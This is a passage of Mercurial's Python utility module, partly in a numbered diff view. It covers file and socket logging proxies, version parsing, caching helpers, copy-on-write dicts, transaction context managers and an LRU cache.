454 return object.__getattribute__(self, name)
455
455
456 return getattr(object.__getattribute__(self, r'_orig'), name)
456 return getattr(object.__getattribute__(self, r'_orig'), name)
457
457
458 def __nonzero__(self):
458 def __nonzero__(self):
459 return bool(object.__getattribute__(self, r'_orig'))
459 return bool(object.__getattribute__(self, r'_orig'))
460
460
461 __bool__ = __nonzero__
461 __bool__ = __nonzero__
462
462
463 def __delattr__(self, name):
463 def __delattr__(self, name):
464 return delattr(object.__getattribute__(self, r'_orig'), name)
464 return delattr(object.__getattribute__(self, r'_orig'), name)
465
465
466 def __setattr__(self, name, value):
466 def __setattr__(self, name, value):
467 return setattr(object.__getattribute__(self, r'_orig'), name, value)
467 return setattr(object.__getattribute__(self, r'_orig'), name, value)
468
468
469 def __iter__(self):
469 def __iter__(self):
470 return object.__getattribute__(self, r'_orig').__iter__()
470 return object.__getattribute__(self, r'_orig').__iter__()
471
471
472 def _observedcall(self, name, *args, **kwargs):
472 def _observedcall(self, name, *args, **kwargs):
473 # Call the original object.
473 # Call the original object.
474 orig = object.__getattribute__(self, r'_orig')
474 orig = object.__getattribute__(self, r'_orig')
475 res = getattr(orig, name)(*args, **kwargs)
475 res = getattr(orig, name)(*args, **kwargs)
476
476
477 # Call a method on the observer of the same name with arguments
477 # Call a method on the observer of the same name with arguments
478 # so it can react, log, etc.
478 # so it can react, log, etc.
479 observer = object.__getattribute__(self, r'_observer')
479 observer = object.__getattribute__(self, r'_observer')
480 fn = getattr(observer, name, None)
480 fn = getattr(observer, name, None)
481 if fn:
481 if fn:
482 fn(res, *args, **kwargs)
482 fn(res, *args, **kwargs)
483
483
484 return res
484 return res
485
485
486 def close(self, *args, **kwargs):
486 def close(self, *args, **kwargs):
487 return object.__getattribute__(self, r'_observedcall')(
487 return object.__getattribute__(self, r'_observedcall')(
488 r'close', *args, **kwargs)
488 r'close', *args, **kwargs)
489
489
490 def fileno(self, *args, **kwargs):
490 def fileno(self, *args, **kwargs):
491 return object.__getattribute__(self, r'_observedcall')(
491 return object.__getattribute__(self, r'_observedcall')(
492 r'fileno', *args, **kwargs)
492 r'fileno', *args, **kwargs)
493
493
494 def flush(self, *args, **kwargs):
494 def flush(self, *args, **kwargs):
495 return object.__getattribute__(self, r'_observedcall')(
495 return object.__getattribute__(self, r'_observedcall')(
496 r'flush', *args, **kwargs)
496 r'flush', *args, **kwargs)
497
497
498 def isatty(self, *args, **kwargs):
498 def isatty(self, *args, **kwargs):
499 return object.__getattribute__(self, r'_observedcall')(
499 return object.__getattribute__(self, r'_observedcall')(
500 r'isatty', *args, **kwargs)
500 r'isatty', *args, **kwargs)
501
501
502 def readable(self, *args, **kwargs):
502 def readable(self, *args, **kwargs):
503 return object.__getattribute__(self, r'_observedcall')(
503 return object.__getattribute__(self, r'_observedcall')(
504 r'readable', *args, **kwargs)
504 r'readable', *args, **kwargs)
505
505
506 def readline(self, *args, **kwargs):
506 def readline(self, *args, **kwargs):
507 return object.__getattribute__(self, r'_observedcall')(
507 return object.__getattribute__(self, r'_observedcall')(
508 r'readline', *args, **kwargs)
508 r'readline', *args, **kwargs)
509
509
510 def readlines(self, *args, **kwargs):
510 def readlines(self, *args, **kwargs):
511 return object.__getattribute__(self, r'_observedcall')(
511 return object.__getattribute__(self, r'_observedcall')(
512 r'readlines', *args, **kwargs)
512 r'readlines', *args, **kwargs)
513
513
514 def seek(self, *args, **kwargs):
514 def seek(self, *args, **kwargs):
515 return object.__getattribute__(self, r'_observedcall')(
515 return object.__getattribute__(self, r'_observedcall')(
516 r'seek', *args, **kwargs)
516 r'seek', *args, **kwargs)
517
517
518 def seekable(self, *args, **kwargs):
518 def seekable(self, *args, **kwargs):
519 return object.__getattribute__(self, r'_observedcall')(
519 return object.__getattribute__(self, r'_observedcall')(
520 r'seekable', *args, **kwargs)
520 r'seekable', *args, **kwargs)
521
521
522 def tell(self, *args, **kwargs):
522 def tell(self, *args, **kwargs):
523 return object.__getattribute__(self, r'_observedcall')(
523 return object.__getattribute__(self, r'_observedcall')(
524 r'tell', *args, **kwargs)
524 r'tell', *args, **kwargs)
525
525
526 def truncate(self, *args, **kwargs):
526 def truncate(self, *args, **kwargs):
527 return object.__getattribute__(self, r'_observedcall')(
527 return object.__getattribute__(self, r'_observedcall')(
528 r'truncate', *args, **kwargs)
528 r'truncate', *args, **kwargs)
529
529
530 def writable(self, *args, **kwargs):
530 def writable(self, *args, **kwargs):
531 return object.__getattribute__(self, r'_observedcall')(
531 return object.__getattribute__(self, r'_observedcall')(
532 r'writable', *args, **kwargs)
532 r'writable', *args, **kwargs)
533
533
534 def writelines(self, *args, **kwargs):
534 def writelines(self, *args, **kwargs):
535 return object.__getattribute__(self, r'_observedcall')(
535 return object.__getattribute__(self, r'_observedcall')(
536 r'writelines', *args, **kwargs)
536 r'writelines', *args, **kwargs)
537
537
538 def read(self, *args, **kwargs):
538 def read(self, *args, **kwargs):
539 return object.__getattribute__(self, r'_observedcall')(
539 return object.__getattribute__(self, r'_observedcall')(
540 r'read', *args, **kwargs)
540 r'read', *args, **kwargs)
541
541
542 def readall(self, *args, **kwargs):
542 def readall(self, *args, **kwargs):
543 return object.__getattribute__(self, r'_observedcall')(
543 return object.__getattribute__(self, r'_observedcall')(
544 r'readall', *args, **kwargs)
544 r'readall', *args, **kwargs)
545
545
546 def readinto(self, *args, **kwargs):
546 def readinto(self, *args, **kwargs):
547 return object.__getattribute__(self, r'_observedcall')(
547 return object.__getattribute__(self, r'_observedcall')(
548 r'readinto', *args, **kwargs)
548 r'readinto', *args, **kwargs)
549
549
550 def write(self, *args, **kwargs):
550 def write(self, *args, **kwargs):
551 return object.__getattribute__(self, r'_observedcall')(
551 return object.__getattribute__(self, r'_observedcall')(
552 r'write', *args, **kwargs)
552 r'write', *args, **kwargs)
553
553
554 def detach(self, *args, **kwargs):
554 def detach(self, *args, **kwargs):
555 return object.__getattribute__(self, r'_observedcall')(
555 return object.__getattribute__(self, r'_observedcall')(
556 r'detach', *args, **kwargs)
556 r'detach', *args, **kwargs)
557
557
558 def read1(self, *args, **kwargs):
558 def read1(self, *args, **kwargs):
559 return object.__getattribute__(self, r'_observedcall')(
559 return object.__getattribute__(self, r'_observedcall')(
560 r'read1', *args, **kwargs)
560 r'read1', *args, **kwargs)
561
561
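# Schematic use for debugging (fileobjectobserver is defined later in this
# module; ui.fout as the log destination is an assumption):
#
#     observer = fileobjectobserver(ui.fout, b'dbg', logdata=True)
#     proxied = fileobjectproxy(open(path, 'rb'), observer)
#     proxied.read(10)  # performs the read, then calls observer.read(res, 10)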
562 class observedbufferedinputpipe(bufferedinputpipe):
562 class observedbufferedinputpipe(bufferedinputpipe):
563 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
563 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
564
564
565 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
565 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
566 bypass ``fileobjectproxy``. Because of this, we need to make
566 bypass ``fileobjectproxy``. Because of this, we need to make
567 ``bufferedinputpipe`` aware of these operations.
567 ``bufferedinputpipe`` aware of these operations.
568
568
569 This variation of ``bufferedinputpipe`` can notify observers about
569 This variation of ``bufferedinputpipe`` can notify observers about
570 ``os.read()`` events. It also re-publishes other events, such as
570 ``os.read()`` events. It also re-publishes other events, such as
571 ``read()`` and ``readline()``.
571 ``read()`` and ``readline()``.
572 """
572 """
573 def _fillbuffer(self):
573 def _fillbuffer(self):
574 res = super(observedbufferedinputpipe, self)._fillbuffer()
574 res = super(observedbufferedinputpipe, self)._fillbuffer()
575
575
576 fn = getattr(self._input._observer, r'osread', None)
576 fn = getattr(self._input._observer, r'osread', None)
577 if fn:
577 if fn:
578 fn(res, _chunksize)
578 fn(res, _chunksize)
579
579
580 return res
580 return res
581
581
582 # We use different observer methods because the operation isn't
582 # We use different observer methods because the operation isn't
583 # performed on the actual file object but on us.
583 # performed on the actual file object but on us.
584 def read(self, size):
584 def read(self, size):
585 res = super(observedbufferedinputpipe, self).read(size)
585 res = super(observedbufferedinputpipe, self).read(size)
586
586
587 fn = getattr(self._input._observer, r'bufferedread', None)
587 fn = getattr(self._input._observer, r'bufferedread', None)
588 if fn:
588 if fn:
589 fn(res, size)
589 fn(res, size)
590
590
591 return res
591 return res
592
592
593 def readline(self, *args, **kwargs):
593 def readline(self, *args, **kwargs):
594 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
594 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
595
595
596 fn = getattr(self._input._observer, r'bufferedreadline', None)
596 fn = getattr(self._input._observer, r'bufferedreadline', None)
597 if fn:
597 if fn:
598 fn(res)
598 fn(res)
599
599
600 return res
600 return res
601
601
602 PROXIED_SOCKET_METHODS = {
602 PROXIED_SOCKET_METHODS = {
603 r'makefile',
603 r'makefile',
604 r'recv',
604 r'recv',
605 r'recvfrom',
605 r'recvfrom',
606 r'recvfrom_into',
606 r'recvfrom_into',
607 r'recv_into',
607 r'recv_into',
608 r'send',
608 r'send',
609 r'sendall',
609 r'sendall',
610 r'sendto',
610 r'sendto',
611 r'setblocking',
611 r'setblocking',
612 r'settimeout',
612 r'settimeout',
613 r'gettimeout',
613 r'gettimeout',
614 r'setsockopt',
614 r'setsockopt',
615 }
615 }
616
616
617 class socketproxy(object):
617 class socketproxy(object):
618 """A proxy around a socket that tells a watcher when events occur.
618 """A proxy around a socket that tells a watcher when events occur.
619
619
620 This is like ``fileobjectproxy`` except for sockets.
620 This is like ``fileobjectproxy`` except for sockets.
621
621
622 This type is intended to only be used for testing purposes. Think hard
622 This type is intended to only be used for testing purposes. Think hard
623 before using it in important code.
623 before using it in important code.
624 """
624 """
625 __slots__ = (
625 __slots__ = (
626 r'_orig',
626 r'_orig',
627 r'_observer',
627 r'_observer',
628 )
628 )
629
629
630 def __init__(self, sock, observer):
630 def __init__(self, sock, observer):
631 object.__setattr__(self, r'_orig', sock)
631 object.__setattr__(self, r'_orig', sock)
632 object.__setattr__(self, r'_observer', observer)
632 object.__setattr__(self, r'_observer', observer)
633
633
634 def __getattribute__(self, name):
634 def __getattribute__(self, name):
635 if name in PROXIED_SOCKET_METHODS:
635 if name in PROXIED_SOCKET_METHODS:
636 return object.__getattribute__(self, name)
636 return object.__getattribute__(self, name)
637
637
638 return getattr(object.__getattribute__(self, r'_orig'), name)
638 return getattr(object.__getattribute__(self, r'_orig'), name)
639
639
640 def __delattr__(self, name):
640 def __delattr__(self, name):
641 return delattr(object.__getattribute__(self, r'_orig'), name)
641 return delattr(object.__getattribute__(self, r'_orig'), name)
642
642
643 def __setattr__(self, name, value):
643 def __setattr__(self, name, value):
644 return setattr(object.__getattribute__(self, r'_orig'), name, value)
644 return setattr(object.__getattribute__(self, r'_orig'), name, value)
645
645
646 def __nonzero__(self):
646 def __nonzero__(self):
647 return bool(object.__getattribute__(self, r'_orig'))
647 return bool(object.__getattribute__(self, r'_orig'))
648
648
649 __bool__ = __nonzero__
649 __bool__ = __nonzero__
650
650
651 def _observedcall(self, name, *args, **kwargs):
651 def _observedcall(self, name, *args, **kwargs):
652 # Call the original object.
652 # Call the original object.
653 orig = object.__getattribute__(self, r'_orig')
653 orig = object.__getattribute__(self, r'_orig')
654 res = getattr(orig, name)(*args, **kwargs)
654 res = getattr(orig, name)(*args, **kwargs)
655
655
656 # Call a method on the observer of the same name with arguments
656 # Call a method on the observer of the same name with arguments
657 # so it can react, log, etc.
657 # so it can react, log, etc.
658 observer = object.__getattribute__(self, r'_observer')
658 observer = object.__getattribute__(self, r'_observer')
659 fn = getattr(observer, name, None)
659 fn = getattr(observer, name, None)
660 if fn:
660 if fn:
661 fn(res, *args, **kwargs)
661 fn(res, *args, **kwargs)
662
662
663 return res
663 return res
664
664
665 def makefile(self, *args, **kwargs):
665 def makefile(self, *args, **kwargs):
666 res = object.__getattribute__(self, r'_observedcall')(
666 res = object.__getattribute__(self, r'_observedcall')(
667 r'makefile', *args, **kwargs)
667 r'makefile', *args, **kwargs)
668
668
669 # The file object may be used for I/O. So we turn it into a
669 # The file object may be used for I/O. So we turn it into a
670 # proxy using our observer.
670 # proxy using our observer.
671 observer = object.__getattribute__(self, r'_observer')
671 observer = object.__getattribute__(self, r'_observer')
672 return makeloggingfileobject(observer.fh, res, observer.name,
672 return makeloggingfileobject(observer.fh, res, observer.name,
673 reads=observer.reads,
673 reads=observer.reads,
674 writes=observer.writes,
674 writes=observer.writes,
675 logdata=observer.logdata,
675 logdata=observer.logdata,
676 logdataapis=observer.logdataapis)
676 logdataapis=observer.logdataapis)
677
677
678 def recv(self, *args, **kwargs):
678 def recv(self, *args, **kwargs):
679 return object.__getattribute__(self, r'_observedcall')(
679 return object.__getattribute__(self, r'_observedcall')(
680 r'recv', *args, **kwargs)
680 r'recv', *args, **kwargs)
681
681
682 def recvfrom(self, *args, **kwargs):
682 def recvfrom(self, *args, **kwargs):
683 return object.__getattribute__(self, r'_observedcall')(
683 return object.__getattribute__(self, r'_observedcall')(
684 r'recvfrom', *args, **kwargs)
684 r'recvfrom', *args, **kwargs)
685
685
686 def recvfrom_into(self, *args, **kwargs):
686 def recvfrom_into(self, *args, **kwargs):
687 return object.__getattribute__(self, r'_observedcall')(
687 return object.__getattribute__(self, r'_observedcall')(
688 r'recvfrom_into', *args, **kwargs)
688 r'recvfrom_into', *args, **kwargs)
689
689
690 def recv_into(self, *args, **kwargs):
690 def recv_into(self, *args, **kwargs):
691 return object.__getattribute__(self, r'_observedcall')(
691 return object.__getattribute__(self, r'_observedcall')(
692 r'recv_into', *args, **kwargs)
692 r'recv_into', *args, **kwargs)
693
693
694 def send(self, *args, **kwargs):
694 def send(self, *args, **kwargs):
695 return object.__getattribute__(self, r'_observedcall')(
695 return object.__getattribute__(self, r'_observedcall')(
696 r'send', *args, **kwargs)
696 r'send', *args, **kwargs)
697
697
698 def sendall(self, *args, **kwargs):
698 def sendall(self, *args, **kwargs):
699 return object.__getattribute__(self, r'_observedcall')(
699 return object.__getattribute__(self, r'_observedcall')(
700 r'sendall', *args, **kwargs)
700 r'sendall', *args, **kwargs)
701
701
702 def sendto(self, *args, **kwargs):
702 def sendto(self, *args, **kwargs):
703 return object.__getattribute__(self, r'_observedcall')(
703 return object.__getattribute__(self, r'_observedcall')(
704 r'sendto', *args, **kwargs)
704 r'sendto', *args, **kwargs)
705
705
706 def setblocking(self, *args, **kwargs):
706 def setblocking(self, *args, **kwargs):
707 return object.__getattribute__(self, r'_observedcall')(
707 return object.__getattribute__(self, r'_observedcall')(
708 r'setblocking', *args, **kwargs)
708 r'setblocking', *args, **kwargs)
709
709
710 def settimeout(self, *args, **kwargs):
710 def settimeout(self, *args, **kwargs):
711 return object.__getattribute__(self, r'_observedcall')(
711 return object.__getattribute__(self, r'_observedcall')(
712 r'settimeout', *args, **kwargs)
712 r'settimeout', *args, **kwargs)
713
713
714 def gettimeout(self, *args, **kwargs):
714 def gettimeout(self, *args, **kwargs):
715 return object.__getattribute__(self, r'_observedcall')(
715 return object.__getattribute__(self, r'_observedcall')(
716 r'gettimeout', *args, **kwargs)
716 r'gettimeout', *args, **kwargs)
717
717
718 def setsockopt(self, *args, **kwargs):
718 def setsockopt(self, *args, **kwargs):
719 return object.__getattribute__(self, r'_observedcall')(
719 return object.__getattribute__(self, r'_observedcall')(
720 r'setsockopt', *args, **kwargs)
720 r'setsockopt', *args, **kwargs)
721
721
class baseproxyobserver(object):
    def _writedata(self, data):
        if not self.logdata:
            if self.logdataapis:
                self.fh.write('\n')
                self.fh.flush()
            return

        # Simple case writes all data on a single line.
        if b'\n' not in data:
            if self.logdataapis:
                self.fh.write(': %s\n' % stringutil.escapestr(data))
            else:
                self.fh.write('%s> %s\n'
                              % (self.name, stringutil.escapestr(data)))
            self.fh.flush()
            return

        # Data with newlines is written to multiple lines.
        if self.logdataapis:
            self.fh.write(':\n')

        lines = data.splitlines(True)
        for line in lines:
            self.fh.write('%s> %s\n'
                          % (self.name, stringutil.escapestr(line)))
        self.fh.flush()

class fileobjectobserver(baseproxyobserver):
    """Logs file object activity."""
    def __init__(self, fh, name, reads=True, writes=True, logdata=False,
                 logdataapis=True):
        self.fh = fh
        self.name = name
        self.logdata = logdata
        self.logdataapis = logdataapis
        self.reads = reads
        self.writes = writes

    def read(self, res, size=-1):
        if not self.reads:
            return
        # Python 3 can return None from reads at EOF instead of empty strings.
        if res is None:
            res = ''

        if size == -1 and res == '':
            # Suppress pointless read(-1) calls that return
            # nothing. These happen _a lot_ on Python 3, and there
            # doesn't seem to be a better workaround to have matching
            # Python 2 and 3 behavior. :(
            return

        if self.logdataapis:
            self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))

        self._writedata(res)

    def readline(self, res, limit=-1):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readline() -> %d' % (self.name, len(res)))

        self._writedata(res)

    def readinto(self, res, dest):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
                                                      res))

        data = dest[0:res] if res is not None else b''

        # _writedata() uses "in" operator and is confused by memoryview because
        # characters are ints on Python 3.
        if isinstance(data, memoryview):
            data = data.tobytes()

        self._writedata(data)

    def write(self, res, data):
        if not self.writes:
            return

        # Python 2 returns None from some write() calls. Python 3 (reasonably)
        # returns the integer bytes written.
        if res is None and data:
            res = len(data)

        if self.logdataapis:
            self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))

        self._writedata(data)

    def flush(self, res):
        if not self.writes:
            return

        self.fh.write('%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedread(%d) -> %d' % (
                self.name, size, len(res)))

        self._writedata(res)

    def bufferedreadline(self, res):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedreadline() -> %d' % (
                self.name, len(res)))

        self._writedata(res)

def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
                          logdata=False, logdataapis=True):
    """Turn a file object into a logging file object."""

    observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
                                  logdata=logdata, logdataapis=logdataapis)
    return fileobjectproxy(fh, observer)

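# Illustrative sketch, not part of the original module: wiring an observer
# onto a pipe so its traffic is mirrored to a log handle. 'pipe' and 'logfh'
# are hypothetical stand-ins for a wrapped file object and a log destination.
def _demologgingfileobject(pipe, logfh):
    fh = makeloggingfileobject(logfh, pipe, b'wire', logdata=True)
    fh.write(b'hello')  # mirrored to logfh as "wire> write(5) -> 5: hello"
    return fh.read(5)   # reads are mirrored the same way
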
class socketobserver(baseproxyobserver):
    """Logs socket activity."""
    def __init__(self, fh, name, reads=True, writes=True, states=True,
                 logdata=False, logdataapis=True):
        self.fh = fh
        self.name = name
        self.reads = reads
        self.writes = writes
        self.states = states
        self.logdata = logdata
        self.logdataapis = logdataapis

    def makefile(self, res, mode=None, bufsize=None):
        if not self.states:
            return

        self.fh.write('%s> makefile(%r, %r)\n' % (
            self.name, mode, bufsize))

    def recv(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv(%d, %d) -> %d' % (
                self.name, size, flags, len(res)))
        self._writedata(res)

    def recvfrom(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
                self.name, size, flags, len(res[0])))

        self._writedata(res[0])

    def recvfrom_into(self, res, buf, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
                self.name, size, flags, res[0]))

        self._writedata(buf[0:res[0]])

    def recv_into(self, res, buf, size=0, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv_into(%d, %d) -> %d' % (
                self.name, size, flags, res))

        self._writedata(buf[0:res])

    def send(self, res, data, flags=0):
        if not self.writes:
            return

        # send() returns the number of bytes written, so log res directly.
        self.fh.write('%s> send(%d, %d) -> %d' % (
            self.name, len(data), flags, res))
        self._writedata(data)

    def sendall(self, res, data, flags=0):
        if not self.writes:
            return

        if self.logdataapis:
            # Returns None on success. So don't bother reporting return value.
            self.fh.write('%s> sendall(%d, %d)' % (
                self.name, len(data), flags))

        self._writedata(data)

    def sendto(self, res, data, flagsoraddress, address=None):
        if not self.writes:
            return

        if address:
            flags = flagsoraddress
        else:
            flags = 0

        if self.logdataapis:
            self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
                self.name, len(data), flags, address, res))

        self._writedata(data)

    def setblocking(self, res, flag):
        if not self.states:
            return

        self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))

    def settimeout(self, res, value):
        if not self.states:
            return

        self.fh.write('%s> settimeout(%r)\n' % (self.name, value))

    def gettimeout(self, res):
        if not self.states:
            return

        self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))

    def setsockopt(self, res, level, optname, value):
        if not self.states:
            return

        self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
            self.name, level, optname, value, res))

def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
                      logdata=False, logdataapis=True):
    """Turn a socket into a logging socket."""

    observer = socketobserver(logh, name, reads=reads, writes=writes,
                              states=states, logdata=logdata,
                              logdataapis=logdataapis)
    return socketproxy(fh, observer)

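# Illustrative sketch, not part of the original module: observing a socket's
# reads, writes, and state changes. 'sock' and 'logfh' are hypothetical
# stand-ins for a connected socket and a log destination.
def _demologgingsocket(sock, logfh):
    s = makeloggingsocket(logfh, sock, b'conn', logdata=True)
    s.settimeout(30)    # logged as "conn> settimeout(30)"
    s.sendall(b'ping')  # logged as "conn> sendall(4, 0): ping"
    return s.recv(4)    # logged as "conn> recv(4, 0) -> 4: ..." plus the data
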
def version():
    """Return version information if available."""
    try:
        from . import __version__
        return __version__.version
    except ImportError:
        return 'unknown'

def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')

    >>> versiontuple(b'4.6rc0')
    (4, 6, None, 'rc0')
    >>> versiontuple(b'4.6rc0+12-425d55e54f98')
    (4, 6, None, 'rc0+12-425d55e54f98')
    >>> versiontuple(b'.1.2.3')
    (None, None, None, '.1.2.3')
    >>> versiontuple(b'12.34..5')
    (12, 34, None, '..5')
    >>> versiontuple(b'1.2.3.4.5.6')
    (1, 2, 3, '.4.5.6')
    """
    if not v:
        v = version()
    m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
    if not m:
        vparts, extra = '', v
    elif m.group(2):
        vparts, extra = m.groups()
    else:
        vparts, extra = m.group(1), None

    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
        except ValueError:
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)

def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keywords args
    if func.__code__.co_argcount == 0:
        cache = []
        def f():
            if len(cache) == 0:
                cache.append(func())
            return cache[0]
        return f
    cache = {}
    if func.__code__.co_argcount == 1:
        # we gain a small amount of time because
        # we don't need to pack/unpack the list
        def f(arg):
            if arg not in cache:
                cache[arg] = func(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                cache[args] = func(*args)
            return cache[args]

    return f

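# Illustrative sketch, not part of the original module: memoizing a pure,
# single-argument function with cachefunc. Note the cache is unbounded, so
# this is only appropriate for small argument domains.
def _demosquare(n):
    return n * n

_demosquarecached = cachefunc(_demosquare)
# The first _demosquarecached(4) computes 16; repeat calls hit the cache.
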
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        if getattr(self, '_copied', 0):
            self._copied -= 1
            return self.__class__(self)
        return self

    def copy(self):
        """always do a cheap copy"""
        self._copied = getattr(self, '_copied', 0) + 1
        return self

class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = src.iteritems()
            for k, v in src:
                self[k] = v

class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """

class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.
    """

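# Illustrative sketch, not part of the original module: the copy-on-write
# discipline shared by cowdict and cowsortdict. copy() is O(1); the real
# copy is deferred until a writer calls preparewrite().
def _demousecow(shared):
    private = shared.copy()           # cheap: only bumps a counter
    private = private.preparewrite()  # now a real copy, safe to mutate
    private[b'key'] = b'value'        # the original 'shared' is untouched
    return private
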
class transactional(object):
    """Base class for making a transactional type into a context manager."""
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        try:
            if exc_type is None:
                self.close()
        finally:
            self.release()

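# Illustrative sketch, not part of the original module: a minimal concrete
# transactional subclass. Used as a context manager, close() runs only on
# success while release() always runs (aborting if close() never happened).
class _demotransaction(transactional):
    def __init__(self):
        self.closed = False
        self.released = False

    def close(self):
        self.closed = True

    def release(self):
        self.released = True
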
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns.
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        tr.close()
        raise
    finally:
        tr.release()

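# Illustrative sketch, not part of the original module: committing a
# transaction even when InterventionRequired interrupts the body. 'tr' is
# a hypothetical object honoring the transactional close()/release() API.
def _demoacceptintervention(tr, work):
    with acceptintervention(tr):
        work()  # raising InterventionRequired here still closes (keeps) tr
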
@contextlib.contextmanager
def nullcontextmanager():
    yield

class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    __slots__ = (r'next', r'prev', r'key', r'value', r'cost')

    def __init__(self):
        self.next = None
        self.prev = None

        self.key = _notset
        self.value = None
        self.cost = 0

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
        self.value = None
        self.cost = 0

class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.

    Items in the cache can be inserted with an optional "cost" value. This is
    simply an integer that is specified by the caller. The cache can be queried
    for the total cost of all items presently in the cache.

    The cache can also define a maximum cost. If a cache insertion would
    cause the total cost of the cache to go beyond the maximum cost limit,
    nodes will be evicted to make room for the new node. This can be used
    to e.g. set a max memory limit and associate an estimated bytes size
    cost to each item in the cache. By default, no maximum cost is enforced.
    """
    def __init__(self, max, maxcost=0):
        self._cache = {}

        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self.capacity = max
        self.totalcost = 0
        self.maxcost = maxcost

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def insert(self, k, v, cost=0):
        """Insert a new item in the cache with optional cost value."""
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            self.totalcost -= node.cost
            node.value = v
            node.cost = cost
            self.totalcost += cost
            self._movetohead(node)

            if self.maxcost:
                self._enforcecostlimit()

            return

